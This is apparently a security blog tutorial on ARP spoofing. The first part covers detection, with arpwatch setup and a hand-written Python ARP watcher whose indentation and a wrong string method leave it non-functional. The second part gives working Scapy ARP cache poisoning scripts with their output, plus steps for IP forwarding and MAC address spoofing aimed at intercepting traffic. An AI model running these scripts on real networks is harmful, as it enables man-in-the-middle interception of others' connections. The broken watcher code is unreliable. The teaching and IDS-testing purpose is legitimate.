So, first of all lets know about ARP cache poisoning, The functionality of the protocol ARP (Address Resolution Protocol) was described in our another Post (https://www.kumaratuljaiswal.in/2021/09/master-local-area-network-lan.html) . A computer that wants to send an IP packet to another host must beforehand request the mac address of the destination by using the ARP protocol. This question gets broadcasted to all members of the network. In a perfect world the only computer that answers is the desired destination. In a not so perfect world an attacker may send its victim every few seconds such an ARP reply packet but with its own MAC address as response and thus redirect the connection to itself.
 

For More info about ARP cache poisoning attack via practical too - CLICK HERE

To defend ARP poisoning attacks one could on one side use static ARP entries, but those could get overwritten by received ARP responses depending on the ARP handling code of the operating system on the other side one could use a tool such as ARP watcher).  

ARP watcher keeps an eye on the ARP traffic and reports suspicious behavior but will not prevent it. Nowadays most modern Intrusion Detection Systems can detect ARP cache poisoning attacks. You should check the
functionality of your IDS by using the above scripts to see how it behaves.

So, There are two methods when we talk about arp watching, the first one is code your own arp watcher and the second thing is used inbuilt tool. Choice is yours but both are same functionality and purpose.

First we choose a inbuilt tool then we work on code your own arpwatching.

Arpwatch

Arpwatch is an opensouce computer software program that helps you to monitor Ethernet traffic activity (like changing IP and MAC Addresses) on your network and maintains a database of ethernet/wlan0/Ip address pairings. It produces a log of noticed pairing of IP and mac addresses information along with a timestamps. This tool is specially useful for Network administrators to keep a watch on ARP activity to detect ARP spoofing or unexpected IP/MAC addresses modifications.

Let's Install

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr/arpcache]
└─$ sudo apt-get install arpwatch               
[sudo] password for hackerboy: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following NEW packages will be installed:
  arpwatch
0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.
Need to get 49.0 kB of archives.
After this operation, 161 kB of additional disk space will be used.
Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 arpwatch amd64 2.1a15-8 [49.0 kB]
Fetched 49.0 kB in 16s (3,125 B/s)  
Selecting previously unselected package arpwatch.
(Reading database ... 407952 files and directories currently installed.)
Preparing to unpack .../arpwatch_2.1a15-8_amd64.deb ...
Unpacking arpwatch (2.1a15-8) ...
Setting up arpwatch (2.1a15-8) ...
update-rc.d: We have no instructions for the arpwatch init script.
update-rc.d: It looks like a network service, we disable it.
arpwatch.service is a disabled or a static unit, not starting it.
Processing triggers for man-db (2.9.4-2) ...
Processing triggers for kali-menu (2021.4.2) ...
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr/arpcache]
└─$ 

Arpwatch configuration description

Arpwatch on systmed based linux systems does not support a configuration file, but the systemd unit files shipped with Debian allow to launch arpwatch with different configurations on each interface.

In order to do that, create a file called IFNAME.iface which contains variable assignments in sh syntax (comments are allowed). You can use the following variables to influence the invocation for that specific interface only:


# ARGS: overwrite the ARGS from /etc/default/arpwatch
# PCAP_FILTER: overwrite (or set) the pcap filter
# IFACE_ARGS: additional options to be passed to arpwatch 

                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ cat /etc/default/arpwatch
# Global options for arpwatch(8).

# do not use the -i, -f or -u options here, they are added automatically
# Debian: don't report bogons, don't use PROMISC.
ARGS="-N -p"

# if you want to add a pcap filter, uncomment and adjust the option below (you
# will need spaces so adding -F to the ARGS above will cause problems). See -F
# option in man 8 arpwatch for more information
#PCAP_FILTER="not ether host (00:11:22:33:44:55 or 66:77:88:99:aa:bb)"

# Debian: run as `arpwatch' user.  Empty this to run as root.
RUNAS="arpwatch"

# when using systemd you have to enable arpwatch explicitly for each interface
# you want to run it on by running:
# systemctl enable arpwatch@IFACE
# systemctl start arpwatch@IFACE

# For the LSB init script, enter a list of interfaces into the list below;
# arpwatch will be started to listen on these interfaces.
# Note: This is ignored when using systemd!
# INTERFACES="eth0 eth1"
INTERFACES=""
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 

I have multiple ethernet interfaces on my debian server and I need run arpwatch on wlan0 interface:

      

                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ ifconfig                                                                                                                                                                          130 ⨯
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 688  bytes 61882 (60.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 688  bytes 61882 (60.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.249.25  netmask 255.255.255.0  broadcast 192.168.249.255
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        inet6 2409:4064:200b:220c:7ad5:600b:2ea3:7963  prefixlen 64  scopeid 0x0<global>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 53817  bytes 30589399 (29.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 62412  bytes 47543548 (45.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 

In addition, on the enp5s0 interfaces I need to monitor changes in mac addresses not only for the 192.168.12.0/24 local network, but also for networks 192.168.122.0/24, 192.168.80/24 and 192.168.125.0/24. Changes in mac addresses I need log to file and also mail to email arpwatch@mydomain.com.

Arpwatch configuration

Go to /etc/arpwatch directory and create file wlan0.iface (IFNAME.iface) with this content:

┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo nano wlan0.iface  
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ cat wlan0.iface           
INTERFACES="wlan0"
ARGS="-N -p"
IFACE_ARGS="-m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 192.168.125.0/24"
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 

Here is man page for arpwatch: https://manpages.debian.org/unstable/arpwatch/arpwatch.8.en.html


# The -m option is used to specify the e-mail address to which reports will be sent. By default, reports are sent to root on the local machine.

# The -n flag specifies additional local networks. This can be useful to avoid bogon warnings when there is more than one network running on the same wire. If the optional width/mask is not specified, the default netmask for the network's class is used.

# The -N flag disables reporting any bogons.

# The -p flag disables promiscuous operation. ARP broadcasts get through hubs without having the interface in promiscuous mode, while saving considerable resources that would be wasted on processing gigabytes of non-broadcast traffic. Setting promiscuous mode does not mean getting 100% traffic that would concern arpwatch.

Arpwatch and systemd

Now you can start your arpwatch on wlan0 interface with systemctl start command:

  
  
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo systemctl daemon-reload
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo systemctl start arpwatch@wlan0 
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 

  

You can check arpwatch daemon

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo systemctl status arpwatch@wlan0                                                                                                                                                2 ⚙
● arpwatch@wlan0.service - arpwatch service on interface wlan0
     Loaded: loaded (/lib/systemd/system/arpwatch@.service; enabled; vendor preset: disabled)
     Active: active (running) since Tue 2022-01-25 18:10:08 IST; 28min ago
       Docs: man:arpwatch(8)
   Main PID: 26295 (arpwatch)
      Tasks: 1 (limit: 4366)
     Memory: 3.1M
        CPU: 745ms
     CGroup: /system.slice/system-arpwatch.slice/arpwatch@wlan0.service
             └─26295 /usr/sbin/arpwatch -u arpwatch -i wlan0 -f wlan0.dat -N -p -m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 212.158.133.0/24 -F ""

Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Stopped arpwatch service on interface wlan0.
Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: arpwatch@wlan0.service: Consumed 2.360s CPU time.
Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Starting arpwatch service on interface wlan0...
Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Started arpwatch service on interface wlan0.
Jan 25 18:10:08 KumarAtulJaiswal arpwatch[26295]: Running as uid=140 gid=149
Jan 25 18:10:08 KumarAtulJaiswal arpwatch[26295]: listening on wlan0
Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.79 e6:e4:e4:95:1e:27 wlan0
Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.25 fc:01:7c:29:00:77 wlan0
Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.45 08:00:27:67:67:30 wlan0
Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: changed ethernet address 192.168.249.45 fc:01:7c:29:00:77 (08:00:27:67:67:30) wlan0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$    

new activity – This ethernet/ip address pair has been used for the first time six months or more.

new station – The ethernet address has not been seen before.

flip flop – The ethernet address has changed from the most recently seen address to the second most recently seen address. If either the old or new ethernet address is a DECnet address and it is less than 24 hours, the email version of the report is suppressed.

changed ethernet address – The host switched to a new ethernet address.

check that arpwatch run

┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ ps aux|grep arp
hackerb+    4312  0.1  0.4 545140 18244 ?        Sl   08:38   0:03 leafpad /home/hackerboy/Desktop/Penetration-tester-jr/arpcache/arpwatch/arpwatch-content.txt
root        6365  0.0  0.0  11140  3212 pts/1    S+   08:46   0:00 sudo python3 arpcache.py 192.168.122.45 192.168.122.30
root        6376  0.1  2.0 129852 76892 pts/1    S+   08:46   0:03 python3 arpcache.py 192.168.122.45 192.168.122.30
arpwatch   14690  0.0  0.1  13680  6700 ?        S    09:15   0:00 /usr/sbin/arpwatch -u arpwatch -i wlan0 -f wlan0.dat -N -p -m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 192.168.125.0/24 -F
hackerb+   19812  0.0  0.0   6316  2260 pts/3    S+   09:35   0:00 grep --color=auto arp
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 

arpwatch after reboot

You have to enable arpwatch@wlan0 service unit to start after system reboot:

┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo systemctl daemon-reload                                                                                                                                                        1 ⚙
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo systemctl enable arpwatch@wlan0                                                                                                                                                1 ⚙
Created symlink /etc/systemd/system/multi-user.target.wants/arpwatch@wlan0.service → /lib/systemd/system/arpwatch@.service.
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$      

Create /var/log/arpwatch directory and file arpwatch.log in this directory:

                                                                                                                                                                                 
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo mkdir /var/log/arpwatch                                                                                                                                                    1 ⨯ 1 ⚙
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo touch /var/log/arpwatch/arpwatch.log                                                                                                                                           1 ⚙
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo chmod 666 /var/log/arpwatch/arpwatch.log                                                                                                                                       1 ⚙

And restart rsyslog daemon:

                                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo systemctl restart rsyslog                                                                                                                                                127 ⨯ 1 ⚙
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$           


┌──(hackerboy㉿KumarAtulJaiswal)-[/var/log/arpwatch]
└─$ sudo systemctl status rsyslog                                                                                                                                                       1 ⚙
● rsyslog.service - System Logging Service
     Loaded: loaded (/lib/systemd/system/rsyslog.service; enabled; vendor preset: enabled)
     Active: active (running) since Mon 2022-01-24 09:51:27 IST; 4min 30s ago
TriggeredBy: ● syslog.socket
       Docs: man:rsyslogd(8)
             man:rsyslog.conf(5)
             https://www.rsyslog.com/doc/
   Main PID: 23919 (rsyslogd)
      Tasks: 4 (limit: 4366)
     Memory: 1.6M
        CPU: 173ms
     CGroup: /system.slice/rsyslog.service
             └─23919 /usr/sbin/rsyslogd -n -iNONE

Jan 24 09:51:27 KumarAtulJaiswal systemd[1]: Starting System Logging Service...
Jan 24 09:51:27 KumarAtulJaiswal systemd[1]: Started System Logging Service.
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: imuxsock: Acquired UNIX socket '/run/systemd/journal/syslog' (fd 3) from systemd.  [v8.2110.0]
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: [origin software="rsyslogd" swVersion="8.2110.0" x-pid="23919" x-info="https://www.rsyslog.com"] start
┌──(hackerboy㉿KumarAtulJaiswal)-[/var/log/arpwatch]
└─$           

And now you can see messges from working arpwatch daemon:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$                                                                                                                                                                               130 ⨯ 2 ⚙
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ cat /var/log/arpwatch/arpwatch.log   
                                                                                                                                         
Jan 25 18:10:07 KumarAtulJaiswal arpwatch: exiting
Jan 25 18:10:08 KumarAtulJaiswal arpwatch: Running as uid=140 gid=149
Jan 25 18:10:08 KumarAtulJaiswal arpwatch: listening on wlan0
Jan 25 18:10:26 KumarAtulJaiswal arpwatch: new station 192.168.249.79 e6:e4:e4:95:1e:27 wlan0
Jan 25 18:10:26 KumarAtulJaiswal arpwatch: new station 192.168.249.25 fc:01:7c:29:00:77 wlan0
Jan 25 18:34:18 KumarAtulJaiswal arpwatch: new station 192.168.249.45 08:00:27:67:67:30 wlan0
Jan 25 18:34:18 KumarAtulJaiswal arpwatch: changed ethernet address 192.168.249.45 fc:01:7c:29:00:77 (08:00:27:67:67:30) wlan0

arpwatch mac addresses files 

Default directory for arpwatch mac addresses databes is /var/lib/arpwatch. File is in IFNAME.dat format. You can print databese content:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ cat /var/lib/arpwatch/wlan0.dat                                                                                                                                                 1 ⨯ 2 ⚙
fc:01:7c:29:00:77       192.168.122.30  1643114422              wlan0
fc:01:7c:29:00:77       192.168.122.25  1643045197              wlan0
e6:e4:e4:95:1e:27       192.168.122.158 1643045197              wlan0
e6:e4:e4:95:1e:27       192.168.249.79  1643119787              wlan0
fc:01:7c:29:00:77       192.168.249.25  1643119770              wlan0
fc:01:7c:29:00:77       192.168.249.45  1643119787              wlan0
08:00:27:67:67:30       192.168.249.45  1643119391              wlan0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$      

NOTE- When you run arpwatch daemon for first time, databese file is empty. You have to restart arpwatch daemon first to see any content. 

Arp-watcher 

Now this time we code own arp-watcher.

#!/usr/bin/python
from scapy.all import sniff, ARP
from signal import signal, SIGINT
import sys
arp_watcher_db_file = "/var/cache/arp-watcher.db"
ip_mac = {}
# Save ARP table on shutdown


def sig_int_handler(signum, frame):
    print "Got SIGINT. Saving ARP database..."
    try:
        f = open(arp_watcher_db_file, "w")
        for (ip, mac) in ip_mac.items():
            f.write(ip + " " + mac + "\n")
            f.close()
            print "Done."
    except IOError:
        print "Cannot write file " + arp_watcher_db_file
        sys.exit(1)


def watch_arp(pkt):
    # got is-at pkt (ARP response)
    if pkt[ARP].op == 2:
        print pkt[ARP].hwsrc + " " + pkt[ARP].psrc
        # Device is new. Remember it.
        if ip_mac.get(pkt[ARP].psrc) == None:
            print "Found new device " + pkt[ARP].hwsrc + " " + pkt[ARP].psrc
            ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
            # Device is known but has a different IP
        elif ip_mac.get(pkt[ARP].psrc) and ip_mac[pkt[ARP].psrc] != pkt[ARP].hwsrc:
            print pkt[ARP].hwsrc + " has got new ip " + pkt[ARP].psrc + " (old " + ip_mac[pkt[ARP].psrc] + ")"
            ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
            signal(SIGINT, sig_int_handler)


if len(sys.argv) < 2:
    print sys.argv[0] + " <iface>"
    sys.exit(0)
    try:
        fh = open(arp_watcher_db_file, "r")
    except IOError:
        print "Cannot read file " + arp_watcher_db_file
        sys.exit(1)
        for line in fh:
            line.chomp()
            (ip, mac) = line.split(" ")
            ip_mac[ip] = mac
            sniff(prn=watch_arp,
                  filter="arp",
                  iface=sys.argv[1],
                  store=0)

python arpwatch.py iface

python arpwatch.py wlan0

At the start we define a signal handler in sig_int_handler() that gets called if the user interrupts the program. This function will save all known IP to MAC resolutions in the ip_mac dictionary to a file. Afterwards we read those ARP db file to initialize the program with all currently known resolutions or exit if the file cannot be read. Than we loop line by line through the files content and split each line into IP and MAC to save them in the ip_mac dictionary. Now we call the already known function sniff() that will invoke the callback function
watch_arp for every received ARP packet.


The function watch_arp implements the real logic of the program. When the sniffed packet is a is-at packet and therefore an ARP response than we first check if the IP exists in the ip_mac dictionary. If we didn’t find an entry the device is new and shows a message to the screen, otherwise we compare the MAC address with the MAC in our dictionary. If it differs the response is probably forged and we print a message to the screen. In both cases the dictionary gets updated with the new information.

Disclaimer

ARP-Cache-Poisoning

The functionality of the protocol ARP (Address Resolution Protocol) was described in our another Post (https://www.kumaratuljaiswal.in/2021/09/master-local-area-network-lan.html) . A computer that wants to send an IP packet to another host must beforehand request the mac address of the destination by using the ARP protocol. This question gets broadcasted to all members of the network. In a perfect world the only computer that answers is the desired destination. In a not so perfect world an attacker may send its victim every few seconds such an ARP reply packet but with its own MAC address as response and thus redirect the connection to itself.


This works because most operating systems accept response packets to questions they never asked!
 

Lets write the code in python networking -

#!/usr/bin/python

import sys
import time
from scapy.all import sendp, ARP, Ether

if len(sys.argv) < 3:
    print(sys.argv[0] + ": <target> <spoof_ip>")  #victim ip and Fake IP, sudo python3 arpcache.py 192.168.122.45 192.168.122.30 
    sys.exit(1)

iface = "wlan0"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]

widelan = Ether()              #before widelan/ether (www.kumaratuljaiswal.in)
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")

packet = widelan / arp

while True:
    sendp(packet, iface=iface)
    time.sleep(10)
    

With the help of Scapy we construct a packet called packet consisting of an Ethernet() and an ARP() header. In the ARP header we set the IP address of the victim (target_ip) and the IP which we would like to hijack all connections (fake_ip). As last parameter we define the OP-Code is-at, that declares the packet as an ARP response. Afterwards the function sendp() sends the packet in an endless loop waiting 10 s between each delivery. Its important to note that you have to call the function sendp() and not the function send(), because the packet should be sent on layer 2. The function send() sends packets on layer 3.

Additional Detail- Let's read

For short refreshing:

Ethernet is on Layer 2, IP (Internet Protocol) on Layer 3, TCP (Transport Control Protocol) or UDP on Layer 4–6 and services like HTTP, SMTP,
FTP on Layer 7.

NOTE - One last thing to remember is to enable IP forwarding otherwise your host would block the connection of the victim.

IP Forwarding

Why we need to use IP Forwarding in scapy (arpcache). Dont worry if you don't know let see If the Linux server is acting as a firewall, router, or NAT device, it will need to be capable of forwarding packets that are meant for other destinations (other than itself).

Conversely, IP forwarding should usually be turned off if you’re not using one of the aforementioned configurations. You typically don’t want your system wasting bandwidth or resources to forward packets elsewhere, unless it’s been designed to do that job.

Check current IP forwarding status

Most systems will be able to use the sysctl command, which can apply kernel variables. Therefore, you can use the following sysctl command to check whether IP forwarding is enabled or disabled.

# sysctl net.ipv4.ip_forward
net.ipv4.ip_forward = 0

In the example above, the net.ipv4.ip_forward kernel setting is 0. That means it’s off. If it were set to 1, that would mean it’s enabled.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ sysctl net.ipv4.ip_forward       
net.ipv4.ip_forward = 0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 

You can also check via this command cat /proc/sys/net/ipv4/ip_forward on file system enable or not!.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ cat /proc/sys/net/ipv4/ip_forward
0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 

Enable or disable IP forwarding

You can use the following sysctl command to enable or disable Linux IP forwarding on your system.

# sysctl -w net.ipv4.ip_forward=0
OR
# sysctl -w net.ipv4.ip_forward=1

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ sudo sysctl net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 

Again we check ip forwarding setting whether it is enabled or not!!!

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ sysctl net.ipv4.ip_forward       
net.ipv4.ip_forward = 1
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 

Don’t forget to check the settings of your packet filter like IPtables, pf or ipfw or just disable it, but now enough about the boring theory lets jump into some practical Python code!

If you only manipulate the ARP cache of the client with the fake_ip you only get the packets of the client, but the responses of the server will stay invisible.

To enforce a bidirectional connection through the computer of the attacker like in above the attacker has to forge both the client and the server with his own MAC for the relevant destination. Our first code is a bit graceless and sends a lot of ARP packets. It doesn’t only
generate more traffic as needed it’s also conspicuous. Stealthy attackers would use another tactic. A computer that wants to get knowledge about an IP address asks with an ARP
request.




Additional Details-

What is Stealth ?

Stealth scan or Half-open scan is one of the scanning methods in Nmap in which the intruder uses to bypass the firewall and authentication mechanisms. Also, by using this method, they make the scan operation as normal network traffic and thus the scan is hidden.



We will write a program that waits for ARP requests and sends a spoofed ARP response for every received request. In a switched environment this will result in every connection flowing over the computer of the attacker, because in every ARP cache there will be the attackers MAC for every IP address. This solution is more elegant and not as noisy as the one before, but still quite easy to detected for a trained admin. The spoofed response packet gets sent in parallel to the response of the real host as illustrated in Fig a.png . The computer whose packet receives first at the victims network card wins.

MAC Address change

Every network card in an Ethernet network has a MAC address that’s world-wide unique and are used to address devices on the net. The MAC address consists of six two digit hexadecimal numbers, which are separated by colons (e.g. aa:bb:cc:11:22:33).

Its a common misbelief that a computer in a local TCP/IP network is reached over its IP address; in reality the MAC address is used for this purpose. Another common misunderstanding is that the MAC address cannot be spoofed. The operating system is responsible to write the MAC into the Ethernet header and systems like GNU/Linux or *BSD have possibilities in their base system to change the MAC with one command.

Also read - https://www.kumaratuljaiswal.in/2020/04/how-to-change-mac-address-with-mac.html

Changing MAC address Command -

Before/n/After

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ sudo ifconfig eth0 hw ether c0:de:de:ad:be:e

[sudo] password for hackerboy: 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ ifconfig                                    
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether c0:de:de:ad:be:0e  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ 

We will write a program that waits for ARP requests and sends a spoofed ARP response for every received request.

import sys
import time
from scapy.all import sniff, sendp, ARP, Ether

if len(sys.argv) > 2:
    print(sys.argv[0] + " <iface>")
    sys.exit(0)


def arp_poison_callback (packet):
    #Got ARP request
    if packet[ARP].op == 1:
        answer = Ether(dst=packet[ARP].hwsrc) / ARP()
        answer[ARP].op = "is-at"
        answer[ARP].hwdst = packet[ARP].hwsrc
        answer[ARP].psrc = packet[ARP].pdst
        answer[ARP].pdst = packet[ARP].psrc

        print("Fooling " + packet[ARP].psrc + " that " + packet[ARP].pdst + " is me")
        sendp(answer, iface=sys.argv[1])


sniff(prn=arp_poison_callback,
      filter="arp",
      iface=sys.argv[1],
      store=0)

The function sniff() reads packets in an endless loop from the interface specified by the parameter iface. The received packets are automatically filtered by the PCAP filter arp that guarantees that our callback function arp_poison_callback will only get called with ARP packets as input. Due to the parameter store=0 the packet will only be saved in memory but not on the hard disk. The function arp_poison_callback() handles the real work of our program.

First of all it checks the OP code of the ARP packet: when it’s 1 the packet is an ARP request and we generate a response packet, that has the source MAC and IP of the request packet as destination MAC and IP. We don’t define a source MAC thus Scapy automatically insert the addresses of the sending network interface.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$                                                                                                                                                                                     
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 arpcache-2.py wlan0 
Fooling 192.168.122.45 that 192.168.122.158 is me
.
Sent 1 packets.
Fooling 192.168.122.158 that 192.168.122.25 is me
.
Sent 1 packets.
Fooling 192.168.122.45 that 192.168.122.158 is me
.
Sent 1 packets.
Fooling 192.168.122.45 that 192.168.122.158 is me
.
Sent 1 packets.
Fooling 192.168.122.158 that 192.168.122.25 is me
.
Sent 1 packets.
Fooling 192.168.122.45 that 192.168.122.158 is me
.
Sent 1 packets.
^C                                                                                                                                                                                          ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$    

The IP to MAC resolution of ARP will get cached for some time, because it would be dump to ask for the resolution of the same address over and over again. This ARP cache can be displayed with the following command.



arp -an



It depends on the operating system, its version and local configuration settings on how long addresses will get cached.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ arp -an                                                                                                                                                                       148 ⨯ 3 ⚙
? (192.168.122.158) at e6:e4:e4:95:1e:27 [ether] on wlan0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$              

To defend ARP poisoning attacks one could on one side use static ARP entries, but those could get overwritten by received ARP responses depending on the ARP handling code of the operating system on the other side one could use a tool such as ARP watcher).  

ARP watcher keeps an eye on the ARP traffic and reports suspicious behavior but will not prevent it. Nowadays most modern Intrusion Detection Systems can detect ARP cache poisoning attacks. You should check the
functionality of your IDS by using the above scripts to see how it behaves.

 

To be Continued......

Disclaimer